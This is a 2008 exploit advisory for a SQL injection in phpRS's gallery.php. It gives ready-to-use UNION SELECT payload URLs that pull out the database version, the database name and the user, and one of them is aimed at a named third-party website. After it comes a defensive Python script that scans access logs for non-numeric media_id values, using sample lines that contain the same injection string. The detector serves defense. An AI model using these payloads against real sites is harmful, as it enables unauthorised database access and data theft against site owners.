phpRS versions 2.6.x and 2.8.x suffer from a remote SQL injection vulnerability in gallery.php.
[~]---------------------------------------------------------------------------------------------------------------------------------------------------------------
[~] phpRS 2.6.x and 2.8.X (gallery.php) SQL Injection Vulnerability
[~]
[~] https://www.supersvet.cz/download.php
[~]
[~]
[~]
------------------------------------------------------------------------------------------------------------
[~] Bug found by d3v1l [Avram Marius]
[~]
[~] Date: 20.11.2008
[~]
[~]
[~] d3v1l@spoofer.com https://security-sh3ll.com
[~]
[~]
------------------------------------------------------------------------------------------------------------
[~] Greetz tO ALL:-
[~]
[~] Security-Shell Members ( https://security-sh3ll.com/forum.php )
[~]
[~] milw0rm <-> packetstorm staff
[~]---------------------------------------------------------------------------------------------------------------------------------------------------------------
[~] Exploit :- gallery.php?akce=obrazek_ukaz&media_id=
[~]
[~] https://site.com/gallery.php?akce=obrazek_ukaz&media_id=1'UNION SELECT
1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16/*
[~]
[~] Ex :-
[~]
[~] https://www.kobravs.com/gallery.php?akce=obrazek_ukaz&media_id=1'UNIONSELECT
1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16/*
[~]---------------------------------------------------------------------------------------------------------------------------------------------------------------
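
A defender-side check for the request pattern above, added here as an example and not part of the original advisory: it scans web-server access logs for gallery.php requests whose media_id is not a plain integer. The combined log format, the function name flag_gallery_requests, and the premise that legitimate media_id values are purely numeric are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside an Apache/nginx "combined" access-log entry (assumed format).
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)
# Assumption: a legitimate media_id is a plain integer key.
NUMERIC_ID = re.compile(r"\d{1,10}")


def flag_gallery_requests(log_lines):
    """Return (client_ip, decoded media_id) for gallery.php hits
    whose media_id is not a plain integer."""
    findings = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable request line
        url = urlsplit(m.group("target"))
        if not url.path.lower().endswith("/gallery.php"):
            continue
        # parse_qs percent-decodes values, so %27 and %20 are seen as ' and space.
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get("media_id", []):
            if not NUMERIC_ID.fullmatch(value):
                findings.append((m.group("ip"), value))
    return findings


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Nov/2008:10:00:01 +0100] "GET /gallery.php?akce=obrazek_ukaz&media_id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [20/Nov/2008:10:00:09 +0100] "GET /gallery.php?akce=obrazek_ukaz&media_id=1%27UNION%20SELECT%201,2,3/* HTTP/1.1" 200 5300 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [20/Nov/2008:10:00:15 +0100] "GET /index.php?media_id=abc HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '203.0.113.4 - - [20/Nov/2008:10:01:02 +0100] "GET /gallery.php?akce=obrazek_ukaz&media_id=12abc HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, value in flag_gallery_requests(SAMPLE_LOG):
        print(f"{ip}\tmedia_id={value!r}")
```

The same integer-only rule, enforced in the application before media_id reaches the SQL query, closes the injection point; the log scan only shows where it has been probed.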